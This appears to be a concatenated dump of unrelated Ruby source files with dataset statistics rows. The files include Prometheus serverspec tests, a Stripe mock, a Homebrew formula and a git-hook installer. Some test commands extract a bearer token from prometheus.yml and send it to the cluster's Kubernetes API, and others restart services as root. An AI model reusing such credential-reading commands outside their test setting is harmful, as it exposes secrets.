class ErlTerm
attr_accessor :str
def initialize(str)
@str = str
end
def self.decode(str)
str.strip!
term_open_str = str[/^(\[|\{|\"|\'|<<|#Ref|<)/,1]
if term_open_str.nil? # integer,float, or, atom
matches = /^(([-0-9\.]+)|([a-z][a-z0-9_]*))/.match(str)
term = case
when (matches[2] && str[/\./]) then str.to_f
when matches[2] then str.to_i
when matches[3] then str.to_sym
end
else
term_close_str = ERL_CLOSE_STRS[term_open_str]
re_ends_with_close_str = Regexp.new(Regexp.escape("#{term_close_str}")+"$")
raise "Parse error, Invalid erlang term #{str}" unless re_ends_with_close_str.match(str)
term = case term_open_str
when '[' then ErlList.new(str)
when '{' then ErlTuple.new(str)
when '"' then ErlString.new(str)
when "'" then ErlAtom.new(str)
when "<<" then ErlBinary.new(str)
when "#Ref" then ErlRef.new(str)
when "<" then ErlPid.new(str)
else raise "Parse error with #{term_open_str}"
end
end
term
end
end
end
| 31.810811 | 96 | 0.562447 |
ed9923bbd1497074748db8980aa26aa6052a52fe | 12,649 | require 'spec_helper'
prometheus_host = 'localhost'
prometheus_port = 9090
kube_apiserver_secure_port = 6443
alertmanager_host = 'localhost'
alertmanager_port = 9093
describe 'Checking if Prometheus user exists' do
describe group('prometheus') do
it { should exist }
end
describe user('prometheus') do
it { should exist }
it { should belong_to_group 'prometheus' }
it { should have_login_shell '/usr/sbin/nologin' }
end
end
describe 'Checking Prometheus directories and files' do
let(:disable_sudo) { false }
describe file('/var/lib/prometheus') do
it { should exist }
it { should be_a_directory }
it { should be_owned_by 'prometheus' }
it { should be_grouped_into 'prometheus' }
end
describe file('/etc/prometheus') do
it { should exist }
it { should be_a_directory }
it { should be_owned_by 'root' }
it { should be_grouped_into 'prometheus' }
end
describe file("/etc/prometheus/prometheus.yml") do
it { should exist }
it { should be_a_file }
it { should be_readable }
end
end
describe 'Checking if Prometheus service is running' do
describe service('prometheus') do
it { should be_enabled }
it { should be_running }
end
end
describe 'Checking if the ports are open' do
describe port(prometheus_port) do
let(:disable_sudo) { false }
it { should be_listening }
end
end
describe 'Checking Prometheus health' do
describe command("curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/graph") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
describe command("curl #{prometheus_host}:#{prometheus_port}/-/ready") do
its(:stdout) { should match /^Prometheus is Ready.$/ }
end
describe command("curl #{prometheus_host}:#{prometheus_port}/-/healthy") do
its(:stdout) { should match /^Prometheus is Healthy.$/ }
end
end
describe 'Checking if Prometheus is serving metrics about itself' do
describe command("curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
describe command("curl #{prometheus_host}:#{prometheus_port}/metrics") do
its(:stdout) { should_not match /^$/ }
end
end
describe 'Checking configuration files for Node exporter' do
listInventoryHosts("node_exporter").each do |val|
describe command("ls /etc/prometheus/file_sd") do
let(:disable_sudo) { false }
its(:stdout) { should match /node-#{val}.yml/ }
end
end
end
describe 'Checking connection to Node Exporter hosts' do
listInventoryHosts("node_exporter").each do |val|
let(:disable_sudo) { false }
describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/node-#{val}.yml)/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
describe 'Checking configuration files for HAProxy Exporter' do
listInventoryHosts("haproxy_exporter").each do |val|
describe command("ls /etc/prometheus/file_sd") do
let(:disable_sudo) { false }
its(:stdout) { should match /haproxy-#{val}.yml/ }
end
end
end
describe 'Checking connection to HAProxy Exporter hosts' do
listInventoryHosts("haproxy_exporter").each do |val|
let(:disable_sudo) { false }
describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\\\").*(?=\\\"\\\])\" /etc/prometheus/file_sd/haproxy-#{val}.yml)/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
describe 'Checking configuration files for JMX Exporter' do
listInventoryHosts("jmx-exporter").each do |val|
describe command("ls /etc/prometheus/file_sd") do
let(:disable_sudo) { false }
its(:stdout) { should match /kafka-jmx-#{val}.yml/ }
its(:stdout) { should match /zookeeper-jmx-#{val}.yml/ }
end
end
end
describe 'Checking connection to JMX Exporter hosts' do
listInventoryHosts("jmx-exporter").each do |val|
let(:disable_sudo) { false }
describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/kafka-jmx-#{val}.yml)/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/zookeeper-jmx-#{val}.yml)/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
describe 'Checking configuration files for Kafka Exporter hosts' do
listInventoryHosts("kafka-exporter").each do |val|
describe command("ls /etc/prometheus/file_sd") do
let(:disable_sudo) { false }
its(:stdout) { should match /kafka-exporter-#{val}.yml/ }
end
end
end
describe 'Checking connection to Kafka Exporter hosts' do
listInventoryHosts("kafka-exporter").each do |val|
let(:disable_sudo) { false }
describe command("curl -o /dev/null -s -w '%{http_code}' $(grep -oP \"(?<=targets: \\\[\').*(?=\'\\\])\" /etc/prometheus/file_sd/kafka-exporter-#{val}.yml)/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
describe 'Checking connection to Kubernetes API server' do
listInventoryHosts("master").each do |val|
let(:disable_sudo) { false }
describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-apiservers /etc/prometheus/prometheus.yml \
| awk '/bearer_token/ {print $2}')\" https://#{val}:#{kube_apiserver_secure_port}/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
describe 'Checking connection to Kubernetes cAdvisor' do
let(:disable_sudo) { false }
listInventoryHosts("master").each do |val_m|
describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-cadvisor /etc/prometheus/prometheus.yml \
| awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_m}/proxy/metrics/cadvisor") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
listInventoryHosts("worker").each do |val_w|
describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-cadvisor /etc/prometheus/prometheus.yml \
| awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_w}/proxy/metrics/cadvisor") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
end
describe 'Checking connection to Kubernetes nodes' do
let(:disable_sudo) { false }
listInventoryHosts("master").each do |val_m|
describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-nodes /etc/prometheus/prometheus.yml \
| awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_m}/proxy/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
listInventoryHosts("worker").each do |val_w|
describe command("curl -o /dev/null -s -w '%{http_code}' -k -H \"Authorization: Bearer $(grep -A 3 kubernetes-nodes /etc/prometheus/prometheus.yml \
| awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_w}/proxy/metrics") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
end
end
end
# Tests for Alertmanager assuming monitoring.alerts.enable == true
if readDataYaml["monitoring"]["alerts"]["enable"] == true
describe 'Checking Alertmanager directories and files' do
let(:disable_sudo) { false }
describe file('/var/lib/prometheus/alertmanager') do
it { should exist }
it { should be_a_directory }
it { should be_owned_by 'prometheus' }
it { should be_grouped_into 'prometheus' }
end
describe file('/etc/prometheus/rules') do
it { should exist }
it { should be_a_directory }
it { should be_owned_by 'root' }
it { should be_grouped_into 'prometheus' }
end
describe file("/etc/prometheus/alertmanager.yml") do
it { should exist }
it { should be_a_file }
it { should be_readable }
end
end
describe 'Checking if Alertmanager service is enabled' do
describe service('alertmanager') do
it { should be_enabled }
end
end
describe 'Validating Alertmanager rules' do
describe command("/usr/local/bin/promtool check rules /etc/prometheus/rules/*") do
let(:disable_sudo) { false }
its(:stdout) { should_not match /FAILED/ }
its(:exit_status) { should eq 0 }
end
end
describe 'Checking if it is possible to create a rule checking if node is up' do
describe command("cp -p /etc/prometheus/rules/UpDown.rules /etc/prometheus/rules/TEST_RULE.rules && sed -i 's/UpDown/TEST_RULE/g; s/down/up/g; s/== 0/== 1/g; \
s/10s/1s/g' /etc/prometheus/rules/TEST_RULE.rules && systemctl restart prometheus") do
let(:disable_sudo) { false }
its(:exit_status) { should eq 0 }
end
describe command("for i in {1..10}; do if [ $(curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/graph) == 200 ]; \
then curl -s #{prometheus_host}:#{prometheus_port}/rules | grep 'TEST_RULE'; break; else echo 'WAITING FOR PROMETHEUS TO BE STARTED'; sleep 1; fi; done;") do
its(:stdout) { should match /TEST_RULE/ }
its(:exit_status) { should eq 0 }
end
describe command("rm -rf /etc/prometheus/rules/TEST_RULE.rules && systemctl restart prometheus") do
let(:disable_sudo) { false }
its(:exit_status) { should eq 0 }
end
describe command("for i in {1..10}; do if [ $(curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/graph) == 200 ]; \
then echo 'PROMETHEUS READY'; break; else echo 'WAITING FOR PROMETHEUS TO BE STARTED'; sleep 1; fi; done;") do
its(:stdout) { should match /READY/ }
its(:exit_status) { should eq 0 }
end
end
# Tests for Alertmanager assuming monitoring.alerts.enable == true and monitoring.alerts.handlers.mail.enable == true
if readDataYaml["monitoring"]["alerts"]["handlers"]["mail"]["enable"] == true
describe 'Checking if the ports are open' do
describe port(alertmanager_port) do
let(:disable_sudo) { false }
it { should be_listening }
end
end
describe 'Checking if Alertmanager service is running' do
describe service('alertmanager') do
it { should be_running }
end
end
describe 'Checking Alertmanager health' do
describe command("curl -o /dev/null -s -w '%{http_code}' #{alertmanager_host}:#{alertmanager_port}") do
it "is expected to be equal" do
expect(subject.stdout.to_i).to eq 200
end
end
describe command("curl #{alertmanager_host}:#{alertmanager_port}/-/ready") do
its(:stdout) { should match /^OK$/ }
end
describe command("curl #{alertmanager_host}:#{alertmanager_port}/-/healthy") do
its(:stdout) { should match /^OK$/ }
end
describe command("curl #{prometheus_host}:#{prometheus_port}/api/v1/alertmanagers") do
its(:stdout_as_json) { should include('status' => 'success') }
end
end
describe 'Checking if it is possible to send an alert' do
describe command("curl -XPOST -d '[{\"labels\":{\"alertname\":\"TEST ALERT\", \"severity\":\"critical\"}}]' #{alertmanager_host}:#{alertmanager_port}/api/v1/alerts") do
its(:stdout_as_json) { should include('status' => 'success') }
end
end
end
end
| 39.160991 | 176 | 0.637046 |
1a3ca81fb1e24030d65dd172be1dd5d7b123b506 | 270 | class CreateAccounts < ActiveRecord::Migration
def self.up
create_table :accounts do |t|
t.string :name
t.string :url
t.string :password
t.text :comments
t.timestamps
end
end
def self.down
drop_table :accounts
end
end
| 15.882353 | 46 | 0.640741 |
1a5257c9023c52ed9cf391e4298e82c47ec137cf | 81 | require 'test_helper'
class PasswordResetsHelperTest < ActionView::TestCase
end
| 16.2 | 53 | 0.839506 |
18692df6497027edb8765778eddab592c955a7dc | 145 | require 'test_helper'
class OpportunitiesControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 18.125 | 67 | 0.751724 |
62a7d480f4de4a3571fa2ff8c3c5e41730f7eb59 | 1,402 | module Ci
class ProjectsController < ::ApplicationController
before_action :project
before_action :no_cache, only: [:badge]
before_action :authorize_read_project!, except: [:badge, :index]
skip_before_action :authenticate_user!, only: [:badge]
protect_from_forgery
def index
redirect_to root_path
end
def show
# Temporary compatibility with CI badges pointing to CI project page
redirect_to namespace_project_path(project.namespace, project)
end
# Project status badge
# Image with build status for sha or ref
#
# This action in DEPRECATED, this is here only for backwards compatibility
# with projects migrated from DoggoHub CI.
#
def badge
return render_404 unless @project
image = Ci::ImageForBuildService.new.execute(@project, params)
send_file image.path, filename: image.name, disposition: 'inline', type: "image/svg+xml"
end
protected
def project
@project ||= Project.find_by(ci_id: params[:id].to_i)
end
def no_cache
response.headers["Cache-Control"] = "no-cache, no-store, max-age=0, must-revalidate"
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "Fri, 01 Jan 1990 00:00:00 GMT"
end
def authorize_read_project!
return access_denied! unless can?(current_user, :read_project, project)
end
end
end
| 29.208333 | 94 | 0.693295 |
38fc42fde11e645c77ea8467bc295f337679b508 | 115 | json.array!(@notes) do |note|
json.extract! note, :id, :date, :text
json.url note_url(note, format: :json)
end
| 23 | 40 | 0.669565 |
28d76bbd714ab4392f348b6ed0d41750f5e60db3 | 2,001 | module StripeMock
module RequestHandlers
module Tokens
def Tokens.included(klass)
klass.add_handler 'post /v1/tokens', :create_token
klass.add_handler 'get /v1/tokens/(.*)', :get_token
end
def create_token(route, method_url, params, headers)
if params[:customer].nil? && params[:card].nil?
raise Stripe::InvalidRequestError.new('You must supply either a card, customer, or bank account to create a token.', nil, 400)
end
cus_id = params[:customer]
if cus_id && params[:source]
customer = assert_existence :customer, cus_id, customers[cus_id]
# params[:card] is an id; grab it from the db
customer_card = get_card(customer, params[:source])
assert_existence :card, params[:source], customer_card
elsif params[:card]
# params[:card] is a hash of cc info; "Sanitize" the card number
params[:card][:fingerprint] = StripeMock::Util.fingerprint(params[:card][:number])
params[:card][:last4] = params[:card][:number][-4,4]
customer_card = params[:card]
else
customer = assert_existence :customer, cus_id, customers[cus_id]
customer_card = get_card(customer, customer[:default_source])
end
token_id = generate_card_token(customer_card)
card = @card_tokens[token_id]
Data.mock_token(params.merge :id => token_id, :card => card)
end
def get_token(route, method_url, params, headers)
route =~ method_url
# A Stripe token can be either a bank token or a card token
bank_or_card = @bank_tokens[$1] || @card_tokens[$1]
assert_existence :token, $1, bank_or_card
if bank_or_card[:object] == 'card'
Data.mock_token(:id => $1, :card => bank_or_card)
elsif bank_or_card[:object] == 'bank_account'
Data.mock_token(:id => $1, :bank_account => bank_or_card)
end
end
end
end
end
| 37.055556 | 136 | 0.626187 |
d5a1197b190b2fc9ac3befa93cca5c4fd6064fcd | 1,574 | class Libuninameslist < Formula
desc "Library of Unicode names and annotation data"
homepage "https://github.com/fontforge/libuninameslist"
url "https://github.com/fontforge/libuninameslist/releases/download/20200413/libuninameslist-dist-20200413.tar.gz"
sha256 "5c0283b2e18d101e58b70a026119d66c9d3e749e4537def7799bba0bc8998f62"
license "BSD-3-Clause"
bottle do
sha256 cellar: :any, arm64_big_sur: "d4d445060083742dc4fc503fd105b8471dedb64797f0ed232d4e9f5de8e9f7f2"
sha256 cellar: :any, big_sur: "1eb14661a5be9d815bf273854935e0004392881a8946fb1e2470283d3938c036"
sha256 cellar: :any, catalina: "38e3ba23a50f2acdebdf4a6419b8e5d996650f9fd9c4e081eb18c77b57dc08ac"
sha256 cellar: :any, mojave: "5bbf66b5f23f99f833b95fae6462084c98838e79142e66a0e602ad7a70dc13f6"
sha256 cellar: :any, high_sierra: "9e6875ea89497fb8f3c8c4121f9142f7ca23f85a4d2ae8b3845d49db4194cf51"
end
head do
url "https://github.com/fontforge/libuninameslist.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
def install
if build.head?
system "autoreconf", "-i"
system "automake"
end
system "./configure", "--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <uninameslist.h>
int main() {
(void)uniNamesList_blockCount();
return 0;
}
EOS
system ENV.cc, "test.c", "-I#{include}", "-L#{lib}", "-luninameslist", "-o", "test"
system "./test"
end
end
| 33.489362 | 116 | 0.715375 |
91dbb1b8e9f476d0b089abd507a58f80279af102 | 2,551 | module Git::Story::Setup
include Git::Story::Utils
extend Git::Story::Utils
MARKER = 'Installed by the git-story gem'
HOOKS_DIR = '.git/hooks'
PREPARE_COMMIT_MESSAGE_SRC = File.join(__dir__, 'prepare-commit-msg')
PREPARE_COMMIT_MESSAGE_DST = File.join(HOOKS_DIR, 'prepare-commit-msg')
CONFIG_TEMPLATE = <<~end
---
pivotal_token: <%= ENV['PIVOTAL_TOKEN'] %>
pivotal_project: 123456789
pivotal_reference_prefix: pivotal
deploy_tag_prefix: production_deploy_
semaphore_auth_token: <%= ENV['SEMAPHORE_AUTH_TOKEN'] %>
semaphore_project_url: https://betterplace.semaphoreci.com/projects/betterplace
todo_nudging: <%= ENV['TODO_NUDGING'].to_i == 1 %>
end
module_function
def perform(force: false)
unless File.directory?('.git')
puts "No directory .git found, you need an initialized git repo for this to work"
return
end
install_config('config/story.yml', force: force)
install_hooks(force: force)
"Setup was performed."
end
def install_hooks(force: false)
for filename in %w[ prepare-commit-msg pre-push ]
if path = file_installed?(filename)
if force || File.read(path).match?(MARKER)
install_file filename
else
ask(
prompt: "File #{path.inspect} not created by git-story."\
" Overwrite? (y/n, default is %s) ",
default: ?n,
) do |response|
if response == ?y
install_file filename
end
end
end
else
install_file filename
end
end
end
def file_installed?(filename)
path = File.join(HOOKS_DIR, filename)
if File.exist?(path)
path
end
end
def install_file(filename)
File.exist?(HOOKS_DIR) or mkdir_p(HOOKS_DIR)
cp File.join(__dir__, filename), dest = File.join(HOOKS_DIR, filename)
puts "#{filename.to_s.inspect} was installed to #{dest.to_s.inspect}."
end
def install_config(filename, force: false)
filename = File.expand_path(filename)
if !force && File.exist?(filename)
ask(
prompt: "File #{filename.to_s.inspect} exists."\
" Overwrite? (y/n, default is %s) ",
default: ?n,
) do |response|
if response != ?y
puts "Skipping creation of #{filename.to_s.inspect}."
return
end
end
end
mkdir_p File.dirname(filename)
File.secure_write(filename) do |io|
io.puts CONFIG_TEMPLATE
end
puts "#{filename.to_s.inspect} was created."
end
end
| 28.032967 | 87 | 0.633477 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.